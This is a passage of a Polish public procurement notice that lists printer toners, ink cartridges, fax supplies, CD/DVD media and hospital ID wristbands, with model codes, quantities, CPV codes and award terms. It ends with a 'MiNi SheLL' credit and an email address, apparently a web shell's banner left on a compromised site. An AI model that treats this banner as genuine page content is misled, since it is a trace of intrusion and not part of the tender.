10.	Toner do drukarki laserowej HP P1102	CE285A	szt.	10
11.	Toner do drukarki laserowej HP P1505n	CB436A	szt.	15
12.	Toner do drukarki laserowej HP P2035	CE505A	szt.	5
13.	Toner do drukarki laserowej HP P2055	CE505X	szt.	10
14.	Toner do drukarki - urządzenia wielofunkcyjnego HP LaserJet M1120N MFP	CB436A	szt.	25
15.	Toner do drukarki laserowej kolorowej HP 2550 black	Q3960A 	szt.	2
	Toner do drukarki laserowej kolorowej HP 2550 cyan	Q3961A 	szt.	2
	Toner do drukarki laserowej kolorowej HP 2550 yellow	Q3962A 	szt.	2
	Toner do drukarki laserowej kolorowej HP 2550 magenta	Q3963A 	szt.	2
16.	Toner do drukarki laserowej HP P3015	CE255X	szt.	8
17.	Toner do drukarki laserowej Lexmark E322	08A0478	szt.	1
18.	Toner do drukarki laserowej OKI B430D	43979202	szt.	3
19.	Toner do urządzenia wielofunkcyjnego BROTHER DCP-7030	TN-2120	szt.	15
20.	Toner do urządzenia wielofunkcyjnego BROTHER DCP-7060 / 7065 (2600 stron przy 5% pokryciu)	TN-2220 	szt.	15
21.	Toner do drukarki laserowej BROTHER HL-5340DL (do 8,000 stron @ 5% pokrycie)	TN-3280	szt.	5
22.	Toner do drukarki laserowej BROTHER HL-5240L (Do 7,000 stron A4 @ 5% pokrycie)	TN-3170	szt.	6
23.	Toner do drukarki laserowej BROTHER HL-2130	TN-2010	szt.	5
24.	Toner do drukarki laserowej BROTHER HL-5450	TN-3380	szt.	25
25.	Toner do drukarki laserowej SAMSUNG Xpres M2825ND	MLT-D116L	szt.	2
26.	Pojemnik z tuszem do drukarki atramentowej Lexmark Z 730	18CX781E 	szt.	4
27.	Pojemnik z tuszem do urządzenia wielofunkcyjnego Lexmark X 4850		szt.	
	czarny    	18Y0144E 		20
	kolorowy   	18YX143E 		5
28.	Pojemnik z tuszem do urządzenia wielofunkcyjnego Lexmark X 1150		szt.	
	czarny    	10N0016		5
	kolorowy   	10N0026		5
29.	Pojemnik z tuszem do urządzenia wielofunkcyjnego HP DeskJet F2280		szt.	
	czarny    	C9351CE		15
	Kolorowy	C9352CE		10
30.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 710 C		szt.	
	czarny  42 ml	51645AE 		5
	kolorowy  30 ml	C1823DE 		5
31.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 845 C		szt.	
	czarny 25 ml	C6615DE 		5
	kolorowy 15 ml	C6625AE 		5
32.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 3515		szt.	
	czarny - HP No. 650    	CZ101AE		4
	kolor - HP No 650	CZ102AE		4
33.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 5440		szt.	
	czarny  5 ml 	C9362EE 		5
	kolorowy  5 ml	C9361EE 		2
34.	Pojemnik z tuszem do drukarki atramentowej HP PhotoSmart 7760		szt.	
	czarny 19 ml	C6656A 		20
	kolorowy  17 ml	C6657A 		15
35.	Pojemnik z tuszem do drukarki atramentowej HP DeskJet 1280C		szt.	
	czarny 42 ml	51645AE 		5
	kolorowy  19 ml	C6578DE		5
36.	Pojemnik z tuszem do drukarki HP 1000/1050		szt.	
	czarny 301XL	CH563EE		5
	kolorowy 301 XL	CH564EE		5
37.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother DCP-J125		szt.	
	black	LC985BK 		15
	cyan	LC985C 		10
	yellow	LC985Y 		10
	magenta	LC985M 		10
38.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother DCP-135C		szt.	
	black	LC970BK 		15
	cyan	LC970C 		10
	yellow	LC970Y 		10
	magenta	LC970M 		10
39.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother DCP-145C / DCP-195C / DCP-375CW		szt.	
	black	LC980BK 		50
	cyan	LC980C 		50
	yellow	LC980Y		50
	magenta	LC980M		50
40.	Pojemnik z tuszem do urządzenia wielofunkcyjnego                Brother MFC-J625 DW		szt.	
	black	LC1240BK 		15
	cyan	LC1240C 		10
	yellow	LC1240Y		10
	magenta	LC1240M		10

Uwaga!
Zamawiający dopuszcza składanie ofert równoważnych (tzw. zamienników). Dostarczone przez Wykonawców materiały eksploatacyjne muszą być kompatybilne z wyżej wymienionym sprzętem.
Brak wypełnienia kolumny -Nazwa handlowa i producent - wymaganymi informacjami spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.20-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Materiały eksploatacyjne do faksu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PANASONIC KX-FT 988    pap. 210*30	KX-A106	szt.	200
2.	PANASONIC KX-FT 936    pap. 210*30	KX-A106	szt.	100
3.	Folia do faksu SHARP UX-P410	UX9CR 	szt.	14
4.	Folia do faksu PANASONIC KX-FP 218 	KX-FA52E 	szt.	12
5.	Toner do faksu PANASONIC KX-FL 613 	KX-FA83 	szt.	2
6.	Toner do faksu Brother FAX-2920	TN-2000 	szt.	20

Uwaga!
Zamawiający dopuszcza składanie ofert równoważnych (tzw. zamienników). Dostarczone przez Wykonawców materiały eksploatacyjne muszą być kompatybilne z wyżej wymienionym sprzętem.
Brak wypełnienia kolumny -Nazwa handlowa i producent - wymaganymi informacjami spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 - Nośniki danych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CD-R 700 MB w opakowaniu plastykowym	szt.	20
2.	CD-R 700 MB bez opakowania, górna część w jasnym kolorze	szt.	11000
3.	CD-R 700 Verbatin	szt.	5500
4.	Płyta TDK DVD+R 4,7 GB w opakowaniu plastikowym	szt.	10
5.	Płyta TDK DVD-R 4,7 GB w opakowaniu plastikowym	szt.	10
6.	Płyta DVD-R 4,7 GB bez opakowania	szt.	200
7.	Płyta DVD+R 4,7 GB bez opakowania	szt.	200

Brak wypełnienia kolumny -Nazwa handlowa i producent - wymaganymi informacjami spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.58.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 - OPASKI  IDENTYFIKACYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Opaska dla dzieci 25,4 x 177,8mm a 500szt do drukarki ZEBRA HC100 - Zebra Z-Band Comfort - kolor biały	kaseta	6
2.	Opaska dla dorosłych 25,4 x 279mm a 200szt do drukarki ZEBRA HC100 - Zebra Z-Band Direct - kolor biały	kaseta	92.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com